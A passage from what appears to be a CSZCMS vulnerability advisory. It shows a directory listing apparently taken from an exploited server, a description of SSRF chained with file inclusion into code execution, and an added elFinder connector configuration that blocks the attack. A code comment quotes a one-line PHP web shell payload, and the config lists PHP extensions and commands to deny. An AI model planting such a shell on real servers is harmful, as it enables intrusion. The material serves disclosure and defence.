8,444 .htaccess<br />04/07/2022 09:13 AM <DIR> .quarantine<br />04/07/2022 09:13 AM <DIR> .tmb<br />04/07/2022 07:07 AM 8 127.0.0.1_csv_banner_mgt_20220407.csv<br />04/07/2022 07:14 AM 
5,362 127.0.0.1_files_20220407.zip<br />04/07/2022 07:14 AM 54,888 127.0.0.1_photo_20220407.zip<br />04/07/2022 06:57 AM <DIR> assets<br />04/09/2018 03:34 PM 479 cache.config.inc.php<br />11/29/2021 07:40 AM 4,733 CHANGELOG<br />04/07/2022 06:55 AM 696 config.inc.php<br />04/07/2022 09:37 AM 17 config_example.inc.php<br />08/07/2018 05:18 AM 4,075 CONTRIBUTING.md<br />04/21/2021 07:01 AM 151,259 corecss.css<br />04/21/2021 07:01 AM 378,086 corejs.js<br />04/07/2022 06:57 AM <DIR> cszcms<br />06/28/2019 09:04 PM 166 devtoolsbar.config.inc.php<br />04/07/2022 06:55 AM 690 env.config.inc.php<br />04/07/2022 06:55 AM 269 htaccess.config.inc.php<br />06/28/2019 02:48 PM 11,526 index.php<br />04/07/2022 06:57 AM <DIR> install<br />01/28/2020 06:40 AM 3,439 LICENSE.md<br />04/09/2018 03:35 PM 336 memcached.config.inc.php<br />04/09/2018 03:34 PM 1,297 nginx_example.com.conf<br />04/07/2022 09:13 AM <DIR> photo<br />04/09/2021 09:52 AM 1,744 proxy.inc.php<br />11/11/2021 07:48 AM 1,868 README.md<br />04/09/2018 03:35 PM 496 redis.config.inc.php<br />11/11/2021 07:46 AM 520 SECURITY.md<br />04/07/2022 06:57 AM <DIR> system<br />04/07/2022 09:13 AM <DIR> templates<br /> 22 File(s) 630,398 bytes<br /> 10 Dir(s) 80,676,995,072 bytes free<br /><br />```<br /><br /># Description:<br /> the attacker might cause the server to make a connection to internal-only services within the organization's infrastructure. 
In other cases, they may be able to force the server to connect to arbitrary external systems, potentially leaking sensitive data such as authorization credentials.<br />Chained with Local File Inclusion, an attack technique in which attackers trick a web application into either running or exposing files on the web server, the SSRF becomes remote code execution once the included file can be executed.<br /><br /># Proof and Exploit:<br />https://i.imgur.com/pzWjkXI.png<br />https://i.imgur.com/xxjxnGk.png<br />https://i.imgur.com/S1F7MaJ.png<br />https://i.imgur.com/BwWTfYU.png<br /></code></pre>
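An elFinder connector configuration that closes each link of the chain above (writing PHP content with `put`, PHP files living in the managed tree, and the managed tree overlapping the web root), added here as an example and not CSZCMS's or elFinder's own code; the media directory path and the permitted image types are assumptions.

```php
<?php
// Added example, not CSZCMS's or elFinder's code: a connector setup for the
// elFinder command set quoted in the advisory. The managed directory and
// the image MIME list are assumptions.
declare(strict_types=1);

// Assumption: elFinder's classes are autoloaded by the application.

// accessControl callback: refuse read/write on anything PHP could execute,
// however it arrived (upload, put, rename, paste), and keep it locked/hidden.
function deny_executable_files($attr, $path, $data, $volume, $isDir, $relpath)
{
    if ($isDir) {
        return null; // directories fall through to the volume defaults
    }
    if (preg_match('/\.(php|phtml|phar|php[3-8]|inc)$/i', basename($path))) {
        return $attr === 'locked' || $attr === 'hidden';
    }
    return null;
}

$opts = array(
    'roots' => array(
        array(
            'driver'        => 'LocalFileSystem',
            // Assumption: a dedicated media directory, never the web root where
            // config_example.inc.php and the other *.inc.php files live. The
            // put in the advisory only worked because the root was the site itself.
            'path'          => dirname(__DIR__) . '/uploads/media/',
            'URL'           => '/uploads/media/',
            // Switch off every command that writes server-side content or
            // mounts remote resources; cmd=put and cmd=mkfile are the ones
            // used above to drop the <?=`$_GET[515]`?> shell.
            'disabled'      => array('put', 'mkfile', 'editor', 'netmount', 'chmod', 'archive', 'extract'),
            // Deny all uploads, then allow only the image types the CMS needs.
            'uploadDeny'    => array('all'),
            'uploadAllow'   => array('image/png', 'image/jpeg', 'image/gif'),
            'uploadOrder'   => array('deny', 'allow'),
            'accessControl' => 'deny_executable_files',
            // Keep elFinder's own work directories (.tmb, .quarantine in the
            // listing above) out of reach of the client.
            'attributes'    => array(
                array('pattern' => '/\.(tmb|quarantine)$/', 'read' => false, 'write' => false, 'hidden' => true, 'locked' => true),
            ),
        ),
    ),
);

$connector = new elFinderConnector(new elFinder($opts));
$connector->run();
```

Pair this with a web-server rule that refuses to execute PHP under the media directory, so a file that slips past the MIME checks is served as data rather than run.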